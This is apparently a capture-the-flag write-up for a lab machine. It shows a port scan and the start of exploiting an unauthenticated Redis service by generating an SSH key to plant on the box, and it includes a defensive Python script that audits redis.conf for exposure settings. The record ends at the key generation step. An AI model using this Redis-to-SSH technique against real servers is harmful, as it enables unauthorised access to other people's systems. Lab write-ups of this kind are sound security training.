1 Scanning
22: that suggests an SSH login may be possible.
80: went through the web app gathering information, including running dirbuster against the directories, but found nothing of value.
10000 is Webmin, a remote administration system. No credentials for that either.
6379 is the Redis service; there are plenty of explainers about it online.
In theory this is a database tool that should run in a trusted internal environment and never be exposed externally. Since it is exposed, it is probably the entry point, and it may not even require password authentication. The client tools can be installed with apt install redis-tools.
Scanning 1 hosts [131070 ports/host]
Discovered open port 10000/tcp on 10.10.10.160
Discovered open port 6379/tcp on 10.10.10.160
Discovered open port 80/tcp on 10.10.10.160
Discovered open port 10000/udp on 10.10.10.160
Discovered open port 22/tcp on 10.10.10.160
Nmap scan report for 10.10.10.160
Host is up (0.25s latency).
PORT STATE SERVICE
6379/tcp open redis
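The point above is that this Redis instance should never have been reachable from outside without a password. As an added example (my own code, not from the original writeup or from Redis), the following audits a redis.conf for the settings that create exactly that exposure; the two configuration samples are constructed and the password is a placeholder.

```python
from typing import List

# Constructed sample: a configuration that lets anyone on the network talk to Redis with no password.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is not set
"""

# Constructed sample: the same instance limited to localhost, with a password, and the file-writing commands renamed away.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass PLACEHOLDER-strong-password
rename-command CONFIG ""
rename-command SAVE ""
"""

def parse_conf(text: str) -> dict:
    """Map each directive to its last value; rename-command lines are collected."""
    conf = {"rename-command": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        if key.lower() == "rename-command":
            conf["rename-command"].append(value.strip())
        else:
            conf[key.lower()] = value.strip()
    return conf

def audit(text: str) -> List[str]:
    """Return one finding per weak setting; an empty list means nothing flagged."""
    conf = parse_conf(text)
    findings = []
    binds = conf.get("bind", "").split()
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: reachable on all interfaces")  # no bind line = all
    if conf.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode: disabled")
    if not conf.get("requirepass"):
        findings.append("requirepass: no password required")
    renamed = {r.split()[0].upper() for r in conf["rename-command"] if r.split()}
    for cmd in ("CONFIG", "SAVE"):  # Redis 6+ can restrict these with ACLs instead
        if cmd not in renamed:
            findings.append(f"{cmd}: still callable by every client")
    return findings
```

Running audit over the weak sample reports all five problems; the hardened sample reports none.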
2 Redis exploitation
I found this online and followed its steps for Redis.
First confirm that there is no password authentication and the service can be entered directly, then generate an SSH key pair, store the public key on the box, and SSH login works directly.
Of course, the directory differs, so it needs a small adjustment. I did not set a passphrase, just pressed Enter.
C:\root> telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
echo "hey"
$3
hey
quit
+OK
Connection closed by foreign host.
C:\root> ssh-keygen -t rsa -C "crack@redis.io"
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:wYLTy+zxSCYXHb47wx1yjRVTmx+pPfJO+9gkRTrUlS8 crack@redis.io
The key's randomart image is:
+---[RSA 3072]